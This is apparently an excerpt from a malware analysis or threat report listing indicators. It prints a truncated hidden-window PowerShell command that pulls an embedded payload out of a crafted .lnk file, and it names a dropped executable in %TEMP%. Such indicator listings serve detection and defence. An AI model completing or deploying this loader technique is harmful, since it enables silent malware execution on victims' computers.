Technical Information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -windowstyle hidden $lnkpath = Get-ChildItem *.lnk | where-object {$_.length -eq 0x000500E6} | Select-Object -ExpandProperty Name; $file = gc $lnkpath -Encoding Byte; for($i=0; $i -lt $file.cou...
- '%TEMP%\tmp1005028280.exe'
- %TEMP%\tmp1005028280.exe